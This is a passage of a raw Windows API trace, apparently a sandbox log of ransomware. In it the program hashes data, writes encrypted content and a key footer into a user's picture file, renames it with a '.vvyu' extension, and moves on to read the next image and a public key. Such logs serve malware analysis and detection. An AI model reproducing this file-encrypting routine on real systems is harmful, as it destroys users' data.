hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.983] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.983] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.983] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.983] GetLastError () returned 0x0 [0192.983] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0192.983] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0192.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.984] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.984] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.984] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3d30) returned 0x2d45778 [0192.984] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41d58 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dc0 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41da0 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39dd8 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0192.985] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0192.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0192.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0192.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0192.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0192.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0192.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e20 [0192.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39e08 [0192.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0192.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0192.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0192.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0192.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0192.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0192.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.988] GetCurrentThreadId () returned 0x264 [0192.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45680 [0192.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0192.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.989] GetCurrentThreadId () returned 0x264 [0192.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0192.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0192.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0192.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0192.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e20 [0192.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39df0 [0192.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e80 [0192.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0192.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0192.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e38 [0192.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e98 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e38 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e08 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0192.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e08 | out: hHeap=0x6a0000) returned 1 [0192.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0192.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e38 | out: hHeap=0x6a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e20 | out: hHeap=0x6a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39df0 | out: hHeap=0x6a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39dd8 | out: hHeap=0x6a0000) returned 1 [0192.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41da0 | out: hHeap=0x6a0000) returned 1 [0192.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.001] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x3d25, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x3d25, lpOverlapped=0x0) returned 1 [0193.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0193.001] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3d2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.001] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.003] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.003] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.003] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.003] CloseHandle (hObject=0x584) returned 1 [0193.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0193.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0193.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0193.005] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\LEjZveDJk.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\lejzvedjk.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\LEjZveDJk.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\lejzvedjk.gif.vvyu")) returned 1 [0193.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0193.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.007] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0193.010] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0149420, ftCreationTime.dwHighDateTime=0x1d8a515, ftLastAccessTime.dwLowDateTime=0xddf92a10, ftLastAccessTime.dwHighDateTime=0x1d8a717, ftLastWriteTime.dwLowDateTime=0xddf92a10, ftLastWriteTime.dwHighDateTime=0x1d8a717, nFileSizeHigh=0x0, nFileSizeLow=0xc5e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TYpweac9t_MP.png", cAlternateFileName="TYPWEA~1.PNG")) returned 1 [0193.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0193.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.010] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\TYpweac9t_MP.png") returned=".png" [0193.010] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\7Q5_45ijmfP9bA\\TYpweac9t_MP.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\7q5_45ijmfp9ba\\typweac9t_mp.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.011] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=50664) returned 1 [0193.011] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.013] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc5c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.014] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.016] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.016] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xc5e8, lpOverlapped=0x0) returned 1 [0193.017] lstrlenA (lpString="-----BEGIN PUBLIC 